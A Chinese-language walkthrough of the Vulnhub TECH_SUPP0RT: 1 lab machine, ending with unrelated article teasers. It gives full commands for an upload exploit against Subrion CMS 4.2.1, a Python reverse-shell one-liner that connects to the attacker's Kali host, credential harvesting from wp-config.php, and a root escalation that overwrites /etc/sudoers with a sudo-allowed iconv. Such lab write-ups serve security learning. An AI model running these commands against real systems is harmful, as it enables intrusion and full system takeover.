Vulnhub-TECH_SUPP0RT: 1渗透

文章目录

  • 一、前言
    • 1、靶机ip配置
    • 2、渗透目标
    • 3、渗透概括
  • 开始实战
    • 一、信息获取
    • 二、使用smb服务获取信息
    • 三、密码破解
    • 四、获取webshell
    • 五、反弹shell
    • 六、web配置文件获取信息
    • 七、提权

一、前言

由于在做靶机的时候,涉及到的渗透思路是非常的广泛,所以在写文章的时候都是挑重点来写,尽量的不饶弯路。具体有不不懂都的可以直接在文章下评论或者私信博主
 如果不会导入Vulnhub靶机和配置网络环境的话,请点我直达发车文章!

 👉本文Vulnhub靶机下载连接-戳我直接下载!👈

1、靶机ip配置

  • Kali IP:192.168.2.4
  • 靶机IP:192.168.2.6靶机ip获取方式如下图
    在这里插入图片描述

2、渗透目标

  • 获取到/root/目录下的flag文件

3、渗透概括

  1. smb信息获取
  2. 使用CyberChef解密密码
  3. 利用Subrion CMSv 4.2.1文件上传漏洞获取shell
  4. 反弹shell
  5. 通过web源码获取信息
  6. 通过sduo iconv越权读写文件配合sudoers文件进行提权


开始实战

一、信息获取

使用nmap工具对靶机做基本的信息收集nmap -sS -sV -A -T4 -p- 靶机IP如下所示
在这里插入图片描述
可以看到,开放的几个端口是22/ssh 80/http 139,445/smb
22/sshssh可以直接pass掉了,这个版本基本上没有什么可利用的漏洞了,一般获取到了用户信息或者爆破的时候才使用这个
80/http基本上大部分的漏洞都是存在于web服务上(至少vulnhub上的靶机是这样的)
139,445/smb这两个端口扫出来的服务是smb服务,我们后续可以进行枚举,看看能不能获取到有用的信息

二、使用smb服务获取信息

那我们首先看看smb服务,我们首先使用smbclient -L //192.168.2.6/命令看一下共享的目录(没有密码直接回车即可)
如下图可疑看到有一个websvr的目录
在这里插入图片描述

我们在使用smbclient //192.168.2.6/websvr 命令登录一下smb服务
ls命令可以看到有一个enter.txt的文本文件
我们再使用get enter.txt命令将该文件下载到本地来,最后使用exit命令即可退出smb服务
在这里插入图片描述

我们使用cat命令看一下这个文件内容
在这里插入图片描述

翻译如下
给了我们一些目标,一个账户和一个加密过的密码
目标2说了一个/subrion无法工作的问题,并且要在panel进行编辑
并告诉我们这个是Subrionwordpress的凭据
在这里插入图片描述

三、密码破解

我们到CyberChef看看这个密码能不能直接解密
我们通过如下操作将这个解密的字符串破解
在这里插入图片描述
可以看到,已经进行解密了,admin密码是Scam2021
在这里插入图片描述

80/http基本上大部分的漏洞都是存在于web服务上,我们访问看看,如下图。是一个Apache的默认页
在这里插入图片描述

我们直接访问/subrion/panel这个目录,发现了一个登录页面
在这里插入图片描述

四、获取webshell

我们直接用我们上一步获取到的账户密码即可登录
在左下角可以看到该站点的版本信息是Subrion CMSv 4.2.1
在这里插入图片描述

我们使用命令searchsploit Subrion 4.2.1搜索一下这个版本的框架的exp
如下,发现可以使用的exp是比较多的,但是能够获取shell的只有第三个的文件上传exp
在这里插入图片描述

我们使用命令cp /usr/share/exploitdb/exploits/php/webapps/49876.py .将该exp拷贝到当前目录来
在这里插入图片描述

再使用如下命令即可获取到shell

python3 49876.py -u http://192.168.2.6/subrion/panel/ -l admin -p Scam2021

在这里插入图片描述

五、反弹shell

由于该exp提供的shell不是很好用,我们重新反弹一个
我们在kali里面使用nc -lvvp 1234命令监听一下shell
在这里插入图片描述

然后使用如下命令将shell发送到我们kali监听的端口

export RHOST="192.168.2.4";export RPORT=1234;python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/bash")'

在这里插入图片描述

如下,此时靶机的shell成功反弹到我们的kali上来了
在这里插入图片描述

六、web配置文件获取信息

由于该靶机存在wordpress站点,那么肯定会有数据库的配置文件,是可以看到明文用户和密码的
我们到wordpress的目录下,如下图wp-config.php就是数据库wordpress的数据库配置文件
在这里插入图片描述

如下图,我们使用cat命令看一下这个配置文件
我们就可以看到里面有一个用户support和一个密码ImAScammerLOL!123!
在这里插入图片描述

七、提权

我们现在使用命令cd /home到家目录看看有哪些用户
如下图可以看到i一个scamsite用户
在这里插入图片描述

我们直接用上一步获取的密码登录一下这个用户看看
如下图可以正常登录
在这里插入图片描述

我们使用sudo -l命令看看sudo权限的命令
如下图发现iconv命令是可以免密以sudo权限执行的
在这里插入图片描述

iconv具有sudo权限,我们是可以通过sudo以root权限查看指定的文件或者修改其内容
我们现在的思路就是通过修改/etc/sudoers文件的内容来进行提权
我们先到tmp目录(没有权限限制),然后再通过mkdir tiquan创建一个文件夹,然后进入这个文件夹
在这里插入图片描述

再通过如下命令将/etc/sudoers文件读取出来,并且进行备份

sudo iconv -f 8859_1 -t 8859_1 "/etc/sudoers" > sudo.bak

在这里插入图片描述

再使用vim对这个备份文件进行修改
scamsite用户所对应的一行修改为如下图红框标注的内容即可
修改完之后记得保存
在这里插入图片描述

再使用如下命令将修改好的sudo.bak文件进行还原

cat sudo.bak |sudo iconv -f 8859_1 -t 8859_1 -o "/etc/sudoers"

在这里插入图片描述

最后再使用sudo su命令即可成功提权到root权限
在这里插入图片描述

我们切换到root的家目录
使用cat命令查看flag文件root.txt即完成了所有的渗透
在这里插入图片描述

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.hqwc.cn/news/418127.html

如若内容造成侵权/违法违规/事实不符,请联系编程知识网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

【Github搭建网站】零基础零成本搭建个人Web网站~

Github网站:https://github.com/ 这是我个人搭建的网站:https://xf2001.github.io/xf/ 大家可以搭建完后发评论区看看!!! 搭建教程:https://www.bilibili.com/video/BV1xc41147Vb/?spm_id_from333.999.0.0…

一行代码就修复了Dubbo的Bug

1.什么是 System.identityHashCode? 2.什么是 hashCode? 3.为什么一行代码就修复了这个 BUG? 前情回顾 先通过一个前情回顾,引出本文所要分享的内容。 Dubbo 一致性哈希负载均衡算法的设计初衷应该是如果没有服务上下线的操作…

内网穿透Neutrino-Proxy, 中微子代理

中微子代理(neutrino-proxy)是一个基于netty的、开源的java内网穿透项目。技术栈:Solon、MybatisPlus、Netty遵循MIT许可,因此您可以对它进行复制、修改、传播并用于任何个人或商业行为。官网地址1:https://neutrino-p…

Unity3D学习之Unity基础——3D数学

文章目录 1. 前言2 Mathf和Math基础2.1 一般用于只计算一次的函数2.1.1 PI Π PI2.1.2 取绝对值 Abs2.1.3 向上取整 CeilToInt2.1.4 向下取整 FloorToInt2.1.5 钳制函数 Clamp2.1.6 获取最大值 Max2.1.7 获取最小值 Min2.1.8 一个数的n次幂 Pow2.1.9 四舍五入 RoundToInt2.1.10…

OpenAI CEO称“AGI时代”即将来临,下一个风口或为能源领域

原创 | 文 BFT机器人 在最近的达沃斯论坛上,Sam Altman以其深邃的见解和前瞻性的思考,再次成为了全场关注的焦点。他以一场激情四溢的演讲,深入剖析了人工智能技术的未来发展趋势,以及它可能对社会和工作领域产生的深远影响。 Al…

计算机毕业设计 | springboot 图书商城(附源码)

1,项目背景 1.1 研究背景 随着网络时代的兴起,各个行业发生了巨大的变革,纷纷加入线上购物服务的行列,书店行业也不例外。传统的图书购买方式不仅需要花费时间去实体店,而且图书价格不透明,顾 大都被动购…

Python爬虫IP池

目录 一、介绍 1.1 为什么需要IP池? 1.2 IP池与代理池的区别 二、构建一个简单的IP池 三、注意事项 一、介绍 在网络爬虫的世界中,IP池是一个关键的概念。它允许爬虫程序在请求网页时使用多个IP地址,从而降低被封禁的风险,提高…

JUC并发编程知识点总结

JMM Java内存模型规定所有的变量都存储在主内存中,包括实例变量,静态变量,但是不包括局部变量和方法参数。每个线程都有自己的工作内存,线程的工作内存保存了该线程用到的变量和主内存的副本拷贝,线程对变量的操作都在…

2024最新Jmeter接口测试教程以及接口测试流程详解

一、Jmeter简介 Jmeter是由Apache公司开发的一个纯Java的开源项目,即可以用于做接口测试也可以用于做性能测试。 Jmeter具备高移植性,可以实现跨平台运行。 Jmeter可以实现分布式负载。 Jmeter采用多线程,允许通过多个线程并发取样或通过独…

5外包功能测试做完,人废了一半····

先说一下自己的情况。大专生,18年通过校招进入湖南某软件公司,干了接近5年的点点点,今年年上旬,感觉自己不能够在这样下去了,长时间呆在一个舒适的环境会让一个人堕落!而我已经在一个企业干了五年的功能测试…

Architecture Lab:预备知识2【汇编call/leave/ret指令、CS:APP练习4.4】

chap4的练习4.4(page.255)让用Y86-64实现rsum(递归求数组元素之和),提示为:先得到x86-64汇编代码,然后转换成Y86-64的 这是rsum的c实现: long rsum(long *start, long count) {if …

ISA Server2006部署RuoYi无法登录的问题

ISA Server2006部署RuoYi无法正常登录。每次登录都会报错如下: 无效的会话,或者会话已过期,请重新登录。 原因分析 在nginx中部署没有问题,在ISA Server就会报这个错。根据登录的原理,我猜测可能是headr中的Author…